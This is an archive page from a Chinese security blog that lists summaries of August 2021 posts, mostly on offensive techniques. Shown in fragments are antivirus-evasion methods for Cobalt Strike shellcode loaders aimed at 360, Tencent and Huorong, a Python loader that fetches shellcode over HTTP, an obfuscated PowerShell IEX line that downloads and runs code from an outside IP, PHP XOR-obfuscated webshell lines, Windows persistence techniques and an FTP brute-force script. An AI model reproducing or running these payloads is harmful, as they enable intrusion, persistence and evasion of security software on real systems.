08 2021 档案

charlotte工具免杀(过360,腾讯,火绒)
摘要:1.使用cs生成bin文件 2.下载工具 https://github.com/9emin1/charlotte 安装mingw-w64* yum install mingw-w64* mac使用 brew install mingw-w64 3.修改payload.bin改名为beacon.bin 阅读全文
posted @ 2021-08-15 00:45 bingtanghulu 阅读(265) 评论(0) 推荐(0)
常用过火绒,360,powershell加载器
摘要:1. import ctypes import base64 import requests #shell需要先进行base64加密,再进行hex加密 code = requests.get("http://192.168.1.1/123.txt") shellcode = bytearray(ba 阅读全文
posted @ 2021-08-14 21:24 bingtanghulu 阅读(45) 评论(0) 推荐(0)
python shellcod加载器修改特征值
摘要:首先网上找一个加载器 pyinstaller -F -w 1.py 进行打包,使用火绒或者360检测 分步排查 每次增加几行代码,逐步找到特征值 找到特征码 分字符函数进行排查,确定字符RltMoveMemory为特征值 RtlMoveMemory作用为从指定内存中复制内存至另一内存里 此时进行混淆 阅读全文
posted @ 2021-08-14 20:37 bingtanghulu 阅读(336) 评论(0) 推荐(0)
python shellcode免杀(过最新360,火绒,不过最新的windows))
摘要:第一步cs生成python版测shellcode 第二步 提取双引号内容,并进行base64编码,放入python04.TXT 第三步 shellcode加载器修改地址,并进行base64加密,放入pythonshellcode.txt。同时将pythonshellcode.txt和python04 阅读全文
posted @ 2021-08-14 15:41 bingtanghulu 阅读(76) 评论(0) 推荐(0)
python shellcode 分析二
摘要:https://forum.90sec.com/t/topic/1587 分析shellcode 将shellcode生成后,使用base64编码,放入buf。将代码写入内存,所以需要将代码解码并转为字节类型。在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为cty 阅读全文
posted @ 2021-08-14 14:35 bingtanghulu 阅读(140) 评论(0) 推荐(0)
python shellcode分析
摘要:https://blog.csdn.net/qq_32261191/article/details/108994177 分析shellcode ctypes是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些 阅读全文
posted @ 2021-08-14 12:31 bingtanghulu 阅读(227) 评论(0) 推荐(0)
poweshell免杀---过火绒
摘要:1.找到csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 2.找到System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Managemen 阅读全文
posted @ 2021-08-14 11:16 bingtanghulu 阅读(43) 评论(0) 推荐(0)
powershell混淆免杀--过360,火绒
摘要:最终结果 windows10 echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodul 阅读全文
posted @ 2021-08-14 10:06 bingtanghulu 阅读(144) 评论(0) 推荐(0)
windows权限维持
摘要:一 注册表 二 计划任务 三 服务 四 影子账户和激活guest 五 快捷键位 六 镜像劫持 七 屏幕保护程序 八 dll劫持 九 wmi后门 一、注册表 打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下新建一个开 阅读全文
posted @ 2021-08-14 00:20 bingtanghulu 阅读(328) 评论(0) 推荐(0)
pocsuite3检测工具 编写poc
摘要:github地址:https://github.com/knownsec/Pocsuite3 首先确定pocsuit的命令执行方式 verify模式为漏洞检测模式 attack模式为向目标发起有效的攻击 首先找到一个poc 进行分析源码 复制其源码,再原有的基础框架进行修改,首先修改检测模块 这里举 阅读全文
posted @ 2021-08-13 21:38 bingtanghulu 阅读(959) 评论(1) 推荐(0)
php异或免杀
摘要:import requests,base64,time,sys,threading,queue #异或免杀 #<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?> #<?php @eval($_POST['hacker']);?> #!和@ 先各种转为 阅读全文
posted @ 2021-08-13 18:45 bingtanghulu 阅读(232) 评论(0) 推荐(0)
python 多线程ftp爆破
摘要:import sys,ftplib import threading,queue def ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,int(port)) while not q.empty():#判断q不为空 dict=q.get() 阅读全文
posted @ 2021-08-13 16:45 bingtanghulu 阅读(184) 评论(0) 推荐(0)
python ip查询 whois查询 # CDN查询# 子域名查询# 端口扫描
摘要:import socket, os, time, sys, whois # ip查询 def ip_check(url): ip = socket.gethostbyname(url) print(ip) # whois查询 def whois_check(url): data = whois.wh 阅读全文
posted @ 2021-08-13 13:43 bingtanghulu 阅读(374) 评论(0) 推荐(0)
python src批量爬取
摘要:import requests, time from lxml import etree def src_tiqu(yeshu): for i in range(1,int(yeshu)+1): try: url = 'https://src.sjtu.edu.cn/list/?i=' + str( 阅读全文
posted @ 2021-08-13 12:44 bingtanghulu 阅读(313) 评论(0) 推荐(0)
python脚本 批量化poc编写
摘要:import requests,base64,time,sys from lxml import etree # fofa网址获取 # 例如:https://fofa.so/result?qbase64 &page=3 def fofa_search(search_data,page): #sear 阅读全文
posted @ 2021-08-13 10:54 bingtanghulu 阅读(336) 评论(0) 推荐(0)